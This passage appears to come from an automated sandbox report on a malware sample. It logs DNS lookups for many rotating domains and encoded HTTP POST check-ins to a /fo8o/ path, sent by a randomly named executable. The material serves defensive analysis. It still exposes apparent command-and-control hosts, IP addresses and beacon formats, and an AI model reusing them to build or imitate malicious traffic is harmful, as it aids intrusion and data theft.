                                                                                          Dec 19, 2024 07:53:55.243753910 CET8049999217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:55.243966103 CET8049999217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:55.244043112 CET4999980192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:55.555305004 CET4999980192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:56.574816942 CET5000080192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:56.694611073 CET8050000217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:56.694724083 CET5000080192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:56.698815107 CET5000080192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:56.818429947 CET8050000217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:57.895500898 CET8050000217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:57.895536900 CET8050000217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:57.895694017 CET5000080192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:57.895857096 CET8050000217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:57.895905972 CET5000080192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:57.898777962 CET5000080192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:58.018650055 CET8050000217.196.55.202192.168.2.5

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 19, 2024 07:50:32.001988888 CET5364353192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:50:33.008780003 CET5364353192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:50:34.008922100 CET5364353192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:50:34.211107969 CET53536431.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:50:34.211148024 CET53536431.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:50:34.211175919 CET53536431.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:50:50.933649063 CET5233753192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:50:51.167866945 CET53523371.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:50:59.230099916 CET6414853192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:50:59.895174026 CET53641481.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:51:14.574572086 CET6482553192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:51:14.907155991 CET53648251.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:51:22.966211081 CET6304053192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:51:23.531375885 CET53630401.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:52:37.980994940 CET6509753192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:52:38.264291048 CET53650971.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:52:52.902602911 CET6316753192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:52:53.122478962 CET53631671.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:53:01.184552908 CET5620353192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:53:01.706144094 CET53562031.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:53:16.246166945 CET6479153192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:53:17.121870041 CET53647911.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:53:31.622642994 CET6524453192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:53:31.857748985 CET53652441.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:53:39.918833971 CET6357053192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:53:40.140256882 CET53635701.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:53:48.199472904 CET5811853192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:53:48.611931086 CET53581181.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:54:02.918811083 CET6442853192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:54:03.141207933 CET53644281.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:54:11.605834961 CET5367353192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:54:11.832828045 CET53536731.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:54:19.887371063 CET5967453192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:54:20.143332005 CET53596741.1.1.1192.168.2.5
                                                                                          Dec 19, 2024 07:54:28.202824116 CET5283553192.168.2.51.1.1.1
                                                                                          Dec 19, 2024 07:54:28.430550098 CET53528351.1.1.1192.168.2.5

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 19, 2024 07:50:32.001988888 CET192.168.2.51.1.1.10x785Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:33.008780003 CET192.168.2.51.1.1.10x785Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:34.008922100 CET192.168.2.51.1.1.10x785Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:50.933649063 CET192.168.2.51.1.1.10xab68Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:59.230099916 CET192.168.2.51.1.1.10x720eStandard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:51:14.574572086 CET192.168.2.51.1.1.10x7f68Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:51:22.966211081 CET192.168.2.51.1.1.10x42a3Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:52:37.980994940 CET192.168.2.51.1.1.10x651Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:52:52.902602911 CET192.168.2.51.1.1.10xa70dStandard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:01.184552908 CET192.168.2.51.1.1.10x1dd2Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:16.246166945 CET192.168.2.51.1.1.10xf023Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:31.622642994 CET192.168.2.51.1.1.10xa67Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:39.918833971 CET192.168.2.51.1.1.10x6dc3Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:48.199472904 CET192.168.2.51.1.1.10x76d2Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:02.918811083 CET192.168.2.51.1.1.10xaf2Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:11.605834961 CET192.168.2.51.1.1.10xd74bStandard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:19.887371063 CET192.168.2.51.1.1.10xfb13Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:28.202824116 CET192.168.2.51.1.1.10x23edStandard query (0)www.b301.spaceA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 19, 2024 07:50:34.211107969 CET1.1.1.1192.168.2.50x785No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:34.211148024 CET1.1.1.1192.168.2.50x785No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:34.211175919 CET1.1.1.1192.168.2.50x785No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:51.167866945 CET1.1.1.1192.168.2.50xab68Name error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:50:59.895174026 CET1.1.1.1192.168.2.50x720eNo error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:51:14.907155991 CET1.1.1.1192.168.2.50x7f68Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:51:23.531375885 CET1.1.1.1192.168.2.50x42a3No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 19, 2024 07:51:23.531375885 CET1.1.1.1192.168.2.50x42a3No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 19, 2024 07:51:23.531375885 CET1.1.1.1192.168.2.50x42a3No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:52:38.264291048 CET1.1.1.1192.168.2.50x651No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:52:53.122478962 CET1.1.1.1192.168.2.50xa70dName error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:01.706144094 CET1.1.1.1192.168.2.50x1dd2No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:17.121870041 CET1.1.1.1192.168.2.50xf023No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:17.121870041 CET1.1.1.1192.168.2.50xf023No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:31.857748985 CET1.1.1.1192.168.2.50xa67Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:40.140256882 CET1.1.1.1192.168.2.50x6dc3Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:48.611931086 CET1.1.1.1192.168.2.50x76d2No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 19, 2024 07:53:48.611931086 CET1.1.1.1192.168.2.50x76d2No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:03.141207933 CET1.1.1.1192.168.2.50xaf2Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:11.832828045 CET1.1.1.1192.168.2.50xd74bName error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:20.143332005 CET1.1.1.1192.168.2.50xfb13Name error (3)www.shenzhoucui.comnonenoneA (IP address)IN (0x0001)false
                                                                                          Dec 19, 2024 07:54:28.430550098 CET1.1.1.1192.168.2.50x23edName error (3)www.b301.spacenonenoneA (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.3xfootball.com
                                                                                          • www.goldenjade-travel.com
                                                                                          • www.magmadokum.com
                                                                                          • www.rssnewscast.com
                                                                                          • www.techchains.info
                                                                                          • www.elettrosistemista.zip
                                                                                          • www.empowermedeco.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549740154.215.72.110805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:50:34.341274977 CET523OUTGET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.3xfootball.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:50:35.888730049 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Thu, 19 Dec 2024 06:50:35 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.549800116.50.37.244805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:00.020395994 CET804OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.goldenjade-travel.com
                                                                                          Origin: http://www.goldenjade-travel.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
                                                                                          Data Ascii: UT5tTdKX=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
                                                                                          Dec 19, 2024 07:51:01.531634092 CET492INHTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html; charset=us-ascii
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Thu, 19 Dec 2024 06:51:00 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 315
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.549806116.50.37.244805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:02.732276917 CET824OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.goldenjade-travel.com
                                                                                          Origin: http://www.goldenjade-travel.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34
                                                                                          Data Ascii: UT5tTdKX=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
                                                                                          Dec 19, 2024 07:51:04.231998920 CET492INHTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html; charset=us-ascii
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Thu, 19 Dec 2024 06:51:03 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 315
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.549812116.50.37.244805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:51:05.384725094 CET1841OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.goldenjade-travel.com
                                                                                          Origin: http://www.goldenjade-travel.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 [TRUNCATED]
                                                                                          Data Ascii: UT5tTdKX=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykj [TRUNCATED]
                                                                                          Dec 19, 2024 07:51:06.890149117 CET492INHTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html; charset=us-ascii
